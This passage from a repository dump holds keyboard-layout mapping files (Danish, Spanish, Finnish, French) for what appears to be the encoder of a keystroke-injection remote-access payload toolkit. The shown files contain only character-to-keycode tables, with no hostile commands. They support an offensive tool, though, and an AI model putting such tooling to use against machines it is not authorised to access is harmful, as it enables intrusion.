CIRCUMFLEX_BITS + KEY_E\n// 234 ê e CIRCUMFLEX\n//ISO_8859_1_EC = GRAVE_ACCENT_BITS + KEY_I\n// 236 ì i GRAVE\n//ISO_8859_1_ED = ACUTE_ACCENT_BITS + KEY_I\n// 237 í i ACUTE\n//ISO_8859_1_EE = CIRCUMFLEX_BITS + KEY_I\n// 238 î i CIRCUMFLEX\n//ISO_8859_1_F2 = GRAVE_ACCENT_BITS + KEY_O\n// 242 ò o GRAVE\n//ISO_8859_1_F3 = ACUTE_ACCENT_BITS + KEY_O\n// 243 ó o ACUTE\n//ISO_8859_1_F4 = CIRCUMFLEX_BITS + KEY_O\n// 244 ô o CIRCUMFLEX\nISO_8859_1_F6 = KEY_SEMICOLON\n// 246 ö o DIAERESIS\n//ISO_8859_1_F9 = GRAVE_ACCENT_BITS + KEY_U\n// 249 ù u GRAVE\n//ISO_8859_1_FA = ACUTE_ACCENT_BITS + KEY_U\n// 250 ú u ACUTE\n//ISO_8859_1_FB = CIRCUMFLEX_BITS + KEY_U\n// 251 û u CIRCUMFLEX\nISO_8859_1_FC = KEY_LEFT_BRACE\n// 252 ü u DIAERESIS\n//ISO_8859_1_FD = ACUTE_ACCENT_BITS + KEY_Z\n// 253 ý y ACUTE\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/dk.properties", "content": "//LAYOUT_DANISH\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32 \nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 \"\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\n// 35 #\nASCII_24 = KEY_4, MODIFIERKEY_RIGHT_ALT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_BACKSLASH\n// 39 ' \nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 ( \nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_BACKSLASH, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_MINUS\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 -\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 55 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT\n// 92 \nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\n// 93 ]\n//ASCII_5E = CIRCUMFLEX_BITS + KEY_SPACE\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\n//ASCII_60 = GRAVE_ACCENT_BITS + KEY_SPACE\n// 96 `\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_Z\n// 122 z\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\n// 123 {\nASCII_7C = KEY_EQUAL, MODIFIERKEY_RIGHT_ALT\n// 124 |\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\n// 125 }\nASCII_7E = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 126 ~ (not tested)\nASCII_7F = KEY_BACKSPACE\n// 127\n\nISO_8859_1_A0 = KEY_SPACE\n// 160 Nonbreakng Space\nISO_8859_1_A3 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 163 £ Pound Sign\nISO_8859_1_A4 = KEY_4, MODIFIERKEY_SHIFT\n// 164 ¤ Currency Sign\nISO_8859_1_A7 = KEY_TILDE, MODIFIERKEY_SHIFT\n// 167 § SECTION SIGN\nISO_8859_1_A8 = DIAERESIS_BITS + KEY_SPACE\n// 168 ¨ DIAERESIS\nISO_8859_1_AB = KEY_4\n// 171 « LEFT DOUBLE ANGLE QUOTE\nISO_8859_1_B4 = ACUTE_ACCENT_BITS + KEY_SPACE\n// 180 ´ ACUTE ACCENT\nISO_8859_1_B5 = KEY_M, MODIFIERKEY_RIGHT_ALT\n// 181 µ MICRO SIGN\nISO_8859_1_BD = KEY_TILDE\n// 189 ½ FRACTION ONE HALF\n//ISO_8859_1_C0 = GRAVE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 192 À A GRAVE\n//ISO_8859_1_C1 = ACUTE_ACCENT_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 193 Á A ACUTE\n//ISO_8859_1_C2 = CIRCUMFLEX_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 194  A CIRCUMFLEX\n//ISO_8859_1_C3 = TILDE_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 195 à A TILDE\n//ISO_8859_1_C4 = DIAERESIS_BITS + KEY_A, MODIFIERKEY_SHIFT\n// 196 Ä A DIAERESIS\nISO_8859_1_C5 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 197 Å A RING ABOVE\nISO_8859_1_C6 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\n// 198 Æ AE\n//ISO_8859_1_C8 = GRAVE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 200 È E GRAVE\n//ISO_8859_1_C9 = ACUTE_ACCENT_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 201 É E ACUTE\n//ISO_8859_1_CA = CIRCUMFLEX_BITS + KEY_E, MODIFIERKEY_SHIFT\n// 202 Ê E CIRCUMFLEX\n//ISO_8859_1_CB = DIAERESIS_BITS + KEY_E, MODIFIERKEY_SHIFT \n// 203 Ë E DIAERESIS\n//ISO_8859_1_CC = GRAVE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 204 Ì I GRAVE\n//ISO_8859_1_CD = ACUTE_ACCENT_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 205 Í I ACUTE\n//ISO_8859_1_CE = CIRCUMFLEX_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 206 Î I CIRCUMFLEX\n//ISO_8859_1_CF = DIAERESIS_BITS + KEY_I, MODIFIERKEY_SHIFT\n// 207 Ï I DIAERESIS\n//ISO_8859_1_D0 = KEY_D, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 208 Ð ETH\n//ISO_8859_1_D1 = TILDE_BITS + KEY_N, MODIFIERKEY_SHIFT\n// 209 Ñ N TILDE\n//ISO_8859_1_D2 = GRAVE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 210 Ò O GRAVE\n//ISO_8859_1_D3 = ACUTE_ACCENT_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 211 Ó O ACUTE\n//ISO_8859_1_D4 = CIRCUMFLEX_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 212 Ô O CIRCUMFLEX\n//ISO_8859_1_D5 = TILDE_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 213 Õ O TILDE\n//ISO_8859_1_D6 = DIAERESIS_BITS + KEY_O, MODIFIERKEY_SHIFT\n// 214 Ö O DIAERESIS\nISO_8859_1_D8 = KEY_QUOTE, MODIFIERKEY_SHIFT\n// 216 Ø O STROKE\n//ISO_8859_1_D9 = GRAVE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 217 Ù U GRAVE\n//ISO_8859_1_DA = ACUTE_ACCENT_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 218 Ú U ACUTE\n//ISO_8859_1_DB = CIRCUMFLEX_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 219 Û U CIRCUMFLEX\n//ISO_8859_1_DC = DIAERESIS_BITS + KEY_U, MODIFIERKEY_SHIFT\n// 220 Ü U DIAERESIS\n//ISO_8859_1_DD = ACUTE_ACCENT_BITS + KEY_Y, MODIFIERKEY_SHIFT\n// 221 Ý Y ACUTE\n//ISO_8859_1_DE = KEY_T, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 222 Þ THORN\nISO_8859_1_DF = KEY_S, MODIFIERKEY_RIGHT_ALT\n// 223 ß SHARP S\n//ISO_8859_1_E0 = GRAVE_ACCENT_BITS + KEY_A\n// 224 à a GRAVE\n//ISO_8859_1_E1 = ACUTE_ACCENT_BITS + KEY_A\n// 225 á a ACUTE\n//ISO_8859_1_E2 = CIRCUMFLEX_BITS + KEY_A\n// 226 â a CIRCUMFLEX\n//ISO_8859_1_E3 = TILDE_BITS + KEY_A\n// 227 ã a TILDE\n//ISO_8859_1_E4 = DIAERESIS_BITS + KEY_A\n// 228 ä a DIAERESIS\nISO_8859_1_E5 = KEY_LEFT_BRACE\n// 229 å a RING ABOVE\nISO_8859_1_E6 = KEY_SEMICOLON\n// 230 æ ae\n//ISO_8859_1_E8 = GRAVE_ACCENT_BITS + KEY_E\n// 232 è e GRAVE\n//ISO_8859_1_E9 = ACUTE_ACCENT_BITS + KEY_E\n// 233 é e ACUTE\n//ISO_8859_1_EA = CIRCUMFLEX_BITS + KEY_E\n// 234 ê e CIRCUMFLEX\n//ISO_8859_1_EB = DIAERESIS_BITS + KEY_E\n// 235 ë e DIAERESIS\n//ISO_8859_1_EC = GRAVE_ACCENT_BITS + KEY_I\n// 236 ì i GRAVE\n//ISO_8859_1_ED = ACUTE_ACCENT_BITS + KEY_I\n// 237 í i ACUTE\n//ISO_8859_1_EE = CIRCUMFLEX_BITS + KEY_I\n// 238 î i CIRCUMFLEX\n//ISO_8859_1_EF = DIAERESIS_BITS + KEY_I\n// 239 ï i DIAERESIS\nISO_8859_1_F0 = KEY_D, MODIFIERKEY_RIGHT_ALT\n// 240 ð ETH\n//ISO_8859_1_F1 = TILDE_BITS + KEY_N\n// 241 ñ n TILDE\n//ISO_8859_1_F2 = GRAVE_ACCENT_BITS + KEY_O\n// 242 ò o GRAVE\n//ISO_8859_1_F3 = ACUTE_ACCENT_BITS + KEY_O\n// 243 ó o ACUTE\n//ISO_8859_1_F4 = CIRCUMFLEX_BITS + KEY_O\n// 244 ô o CIRCUMFLEX\n//ISO_8859_1_F5 = TILDE_BITS + KEY_O\n// 245 õ o TILDE\n//ISO_8859_1_F6 = DIAERESIS_BITS + KEY_O\n// 246 ö o DIAERESIS\nISO_8859_1_F8 = KEY_QUOTE\n// 248 ø o STROKE\n//ISO_8859_1_F9 = GRAVE_ACCENT_BITS + KEY_U\n// 249 ù u GRAVE\n//ISO_8859_1_FA = ACUTE_ACCENT_BITS + KEY_U\n// 250 ú u ACUTE\n//ISO_8859_1_FB = CIRCUMFLEX_BITS + KEY_U\n// 251 û u CIRCUMFLEX\n//ISO_8859_1_FC = DIAERESIS_BITS + KEY_U\n// 252 ü u DIAERESIS\n//ISO_8859_1_FD = ACUTE_ACCENT_BITS + KEY_Y\n// 253 ý y ACUTE\nISO_8859_1_FE = KEY_T, MODIFIERKEY_RIGHT_ALT\n// 254 þ THORN\n//ISO_8859_1_FF = DIAERESIS_BITS + KEY_Y\n// 255 ÿ y DIAERESIS\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\n// € Euro Sign\n\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/es.properties", "content": "// Author: Midnitesnake\n// 01-11-2014\n// LAYOUT_ESPANOL\n// Based from Italian Keymap\n// Thanks to Jaime.AlvarezdeAldecoa for patches\n\nKEY_NON_US_100 = 100\n\nASCII_20 = KEY_SPACE\n// 32\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\n// 33 !\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\n// 34 “\"\nASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT\n// 35 #\nASCII_24 = KEY_4, MODIFIERKEY_SHIFT\n// 36 $\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\n// 37 %\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\n// 38 &\nASCII_27 = KEY_MINUS\n// 39 ‘\nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\n// 40 (\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\n// 41 )\nASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\n// 42 *\nASCII_2B = KEY_RIGHT_BRACE\n// 43 +\nASCII_2C = KEY_COMMA\n// 44 ,\nASCII_2D = KEY_SLASH\n// 45 –\nASCII_2E = KEY_PERIOD\n// 46 .\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\n// 47 /\nASCII_30 = KEY_0\n// 48 0\nASCII_31 = KEY_1\n// 49 1\nASCII_32 = KEY_2\n// 50 2\nASCII_33 = KEY_3\n// 51 3\nASCII_34 = KEY_4\n// 52 4\nASCII_35 = KEY_5\n// 53 5\nASCII_36 = KEY_6\n// 54 6\nASCII_37 = KEY_7\n// 55 7\nASCII_38 = KEY_8\n// 56 8\nASCII_39 = KEY_9\n// 57 9\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\n// 58 :\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\n// 59 ;\nASCII_3C = KEY_NON_US_100\n// 60 <\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\n// 61 =\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\n// 62 >\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\n// 63 ?\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\n// 64 @\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\n// 65 A\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\n// 66 B\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\n// 67 C\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\n// 68 D\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\n// 69 E\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\n// 70 F\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\n// 71 G\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\n// 72 H\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\n// 73 I\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\n// 74 J\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\n// 75 K\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\n// 76 L\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\n// 77 M\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\n// 78 N\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\n// 79 O\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\n// 80 P\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\n// 81 Q\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\n// 82 R\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\n// 83 S\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\n// 84 T\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\n// 85 U\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\n// 86 V\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\n// 87 W\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\n// 88 X\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\n// 89 Y\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\n// 90 Z\nASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 91 [\nASCII_5C = KEY_TILDE, MODIFIERKEY_RIGHT_ALT\n// 92 \\\n\nASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\n// 93 ]\nASCII_5E = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 94 ^\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\n// 95 _\n\n// ascii 60, 96: accento grave, non mappato\nASCII_61 = KEY_A\n// 97 a\nASCII_62 = KEY_B\n// 98 b\nASCII_63 = KEY_C\n// 99 c\nASCII_64 = KEY_D\n// 100 d\nASCII_65 = KEY_E\n// 101 e\nASCII_66 = KEY_F\n// 102 f\nASCII_67 = KEY_G\n// 103 g\nASCII_68 = KEY_H\n// 104 h\nASCII_69 = KEY_I\n// 105 i\nASCII_6A = KEY_J\n// 106 j\nASCII_6B = KEY_K\n// 107 k\nASCII_6C = KEY_L\n// 108 l\nASCII_6D = KEY_M\n// 109 m\nASCII_6E = KEY_N\n// 110 n\nASCII_6F = KEY_O\n// 111 o\nASCII_70 = KEY_P\n// 112 p\nASCII_71 = KEY_Q\n// 113 q\nASCII_72 = KEY_R\n// 114 r\nASCII_73 = KEY_S\n// 115 s\nASCII_74 = KEY_T\n// 116 t\nASCII_75 = KEY_U\n// 117 u\nASCII_76 = KEY_V\n// 118 v\nASCII_77 = KEY_W\n// 119 w\nASCII_78 = KEY_X\n// 120 x\nASCII_79 = KEY_Y\n// 121 y\nASCII_7A = KEY_Z\n// 122 z\nASCII_7B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 123 {\nASCII_7C = KEY_1, MODIFIERKEY_RIGHT_ALT\n// 124 |\nASCII_7D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT, MODIFIERKEY_SHIFT\n// 125 }\nASCII_7E = KEY_4, MODIFIERKEY_RIGHT_ALT\n// 126 ~\nISO_8859_1_BA = KEY_TILDE\n// 127 º\n\n// ascii 7E, 126: tilde, non mappato\nISO_8859_1_E0 = KEY_QUOTE\n// 192 a grave\nISO_8859_1_E8 = KEY_LEFT_BRACE\n// 232 e grave\nISO_8859_1_E9 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT\n// 233 e acuta\nISO_8859_1_EC = KEY_EQUAL\n// 236 i grave\nISO_8859_1_F2 = KEY_SEMICOLON\n// 242 o grave\nISO_8859_1_F9 = KEY_BACKSLASH\n// 249 u grave\n" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/fi.properties", "content": "//LANGUAGE_FINLAND\r\n//translation: ziolity (01/08/2014)\r\nKEY_NON_US_100 = 100\r\nISO_8859_1_A7 = KEY_TILDE\r\nASCII_20 = KEY_SPACE\r\nASCII_30 = KEY_0\r\nASCII_31 = KEY_1\r\nASCII_32 = KEY_2\r\nASCII_33 = KEY_3\r\nASCII_34 = KEY_4\r\nASCII_35 = KEY_5\r\nASCII_36 = KEY_6\r\nASCII_37 = KEY_7\r\nASCII_38 = KEY_8\r\nASCII_39 = KEY_9\r\nASCII_2B = KEY_MINUS\r\nISO_8859_1_B4 = KEY_EQUAL\r\nASCII_71 = KEY_Q\r\nASCII_77 = KEY_W\r\nASCII_65 = KEY_E\r\nASCII_72 = KEY_R\r\nASCII_74 = KEY_T\r\nASCII_79 = KEY_Y\r\nASCII_75 = KEY_U\r\nASCII_69 = KEY_I\r\nASCII_6F = KEY_O\r\nASCII_70 = KEY_P\r\nASCII_61 = KEY_A\r\nISO_8859_1_E4 = KEY_RIGHT_BRACE\r\nASCII_73 = KEY_S\r\nASCII_64 = KEY_D\r\nASCII_66 = KEY_F\r\nASCII_67 = KEY_G\r\nASCII_68 = KEY_H\r\nASCII_6A = KEY_J\r\nASCII_6B = KEY_K\r\nASCII_6C = KEY_L\r\nISO_8859_1_F6 = KEY_SEMICOLON\r\nISO_8859_1_E4 = KEY_QUOTE\r\nASCII_27 = KEY_BACKSLASH\r\nASCII_3C = KEY_NON_US_100\r\nASCII_7A = KEY_Z\r\nASCII_78 = KEY_X\r\nASCII_63 = KEY_C\r\nASCII_76 = KEY_V\r\nASCII_62 = KEY_B\r\nASCII_6E = KEY_N\r\nASCII_6D = KEY_M\r\nASCII_2C = KEY_COMMA\r\nASCII_2E = KEY_PERIOD\r\nASCII_2D = KEY_SLASH\r\nASCII_21 = KEY_1, MODIFIERKEY_SHIFT\r\nASCII_22 = KEY_2, MODIFIERKEY_SHIFT\r\nASCII_23 = KEY_3, MODIFIERKEY_SHIFT\r\nISO_8859_1_A4 = KEY_4, MODIFIERKEY_SHIFT\r\nASCII_25 = KEY_5, MODIFIERKEY_SHIFT\r\nASCII_26 = KEY_6, MODIFIERKEY_SHIFT\r\nASCII_2F = KEY_7, MODIFIERKEY_SHIFT\r\nASCII_28 = KEY_8, MODIFIERKEY_SHIFT\r\nASCII_29 = KEY_9, MODIFIERKEY_SHIFT\r\nASCII_3D = KEY_0, MODIFIERKEY_SHIFT\r\nASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT\r\nASCII_60 = KEY_EQUAL, MODIFIERKEY_SHIFT\r\nASCII_51 = KEY_Q, MODIFIERKEY_SHIFT\r\nASCII_57 = KEY_W, MODIFIERKEY_SHIFT\r\nASCII_45 = KEY_E, MODIFIERKEY_SHIFT\r\nASCII_52 = KEY_R, MODIFIERKEY_SHIFT\r\nASCII_54 = KEY_T, MODIFIERKEY_SHIFT\r\nASCII_59 = KEY_Y, MODIFIERKEY_SHIFT\r\nASCII_55 = KEY_U, MODIFIERKEY_SHIFT\r\nASCII_49 = KEY_I, MODIFIERKEY_SHIFT\r\nASCII_4F = KEY_O, MODIFIERKEY_SHIFT\r\nASCII_50 = KEY_P, MODIFIERKEY_SHIFT\r\nASCII_41 = KEY_A, MODIFIERKEY_SHIFT\r\nASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT\r\nASCII_53 = KEY_S, MODIFIERKEY_SHIFT\r\nASCII_44 = KEY_D, MODIFIERKEY_SHIFT\r\nASCII_46 = KEY_F, MODIFIERKEY_SHIFT\r\nASCII_47 = KEY_G, MODIFIERKEY_SHIFT\r\nASCII_48 = KEY_H, MODIFIERKEY_SHIFT\r\nASCII_4A = KEY_J, MODIFIERKEY_SHIFT\r\nASCII_4B = KEY_K, MODIFIERKEY_SHIFT\r\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\r\nISO_8859_1_D6 = KEY_SEMICOLON, MODIFIERKEY_SHIFT\r\nISO_8859_1_C4 = KEY_QUOTE, MODIFIERKEY_SHIFT\r\nASCII_2A = KEY_BACKSLASH, MODIFIERKEY_SHIFT\r\nASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT\r\nASCII_5A = KEY_Z, MODIFIERKEY_SHIFT\r\nASCII_58 = KEY_X, MODIFIERKEY_SHIFT\r\nASCII_43 = KEY_C, MODIFIERKEY_SHIFT\r\nASCII_56 = KEY_V, MODIFIERKEY_SHIFT\r\nASCII_42 = KEY_B, MODIFIERKEY_SHIFT\r\nASCII_4E = KEY_N, MODIFIERKEY_SHIFT\r\nASCII_4D = KEY_M, MODIFIERKEY_SHIFT\r\nASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT\r\nASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT\r\nASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT\r\nASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT\r\nASCII_4C = KEY_L, MODIFIERKEY_SHIFT\r\nASCII_24 = KEY_4, MODIFIERKEY_RIGHT_ALT\r\nUNICODE_20AC = KEY_E, MODIFIERKEY_RIGHT_ALT\r\nASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT\r\nASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT\r\nASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT\r\nASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT\r\nASCII_5C = KEY_MINUS, MODIFIERKEY_RIGHT_ALT\r\nASCII_7E = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT\r\nASCII_7C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT\r\nISO_8859_1_B5 = KEY_M, MODIFIERKEY_RIGHT_ALT" }, { "path": "payloads/library/remote_access/duckNet/Encoder/resources/fr.properties", "content": "// french layout\nKEY_NON_US_100 = 100\n\n// 32 \nASCII_20 = KEY_SPACE\t\t\t\t\t\n // 33 !\nASCII_21 = KEY_SLASH\t\t\t\t\t\n// 34 \"\nASCII_22 = KEY_3\t\t\t\t\t\n// 35 #\nASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT\t\t\t\t\n// 36 $\nASCII_24 = KEY_RIGHT_BRACE\t\t\t\t\n// 37 %\nASCII_25 = KEY_QUOTE, MODIFIERKEY_SHIFT\t\t\t\n// 38 &\nASCII_26 = KEY_1\t\t\t\t\t\n// 39 ' \nASCII_27 = KEY_4\t\t\t\t\t\n// 40 ( \nASCII_28 = KEY_5\t\t\t\t\t\n// 41 )\nASCII_29 = KEY_MINUS\t\t\t\t\t\n// 42 *\nASCII_2A = KEY_BACKSLASH\t\t\t\t\n// 43 +\nASCII_2B = KEY_EQUAL, MODIFIERKEY_SHIFT\t\t\t\n// 44 ,\nASCII_2C = KEY_M\t\t\t\t\t\n// 45 -\nASCII_2D = KEY_6\t\t\t\t\t\n// 46 .\nASCII_2E = KEY_COMMA, MODIFIERKEY_SHIFT\t\t\t\n// 47 /\nASCII_2F = KEY_PERIOD, MODIFIERKEY_SHIFT\t\t\t\n// 48 0\nASCII_30 = KEY_0, MODIFIERKEY_SHIFT\t\t\t\t\n// 49 1\nASCII_31 = KEY_1, MODIFIERKEY_SHIFT\t\t\t\t\n// 50 2\nASCII_32 = KEY_2, MODIFIERKEY_SHIFT\t\t\t\t\n// 51 3\nASCII_33 = KEY_3, MODIFIERKEY_SHIFT\t\t\t\t\n// 52 4\nASCII_34 = KEY_4, MODIFIERKEY_SHIFT\t\t\t\t\n// 53 5\nASCII_35 = KEY_5, MODIFIERKEY_SHIFT\t\t\t\t\n// 54 6\nASCII_36 = KEY_6, MODIFIERKEY_SHIFT\t\t\t\t\n// 55 7\nASCII_37 = KEY_7, 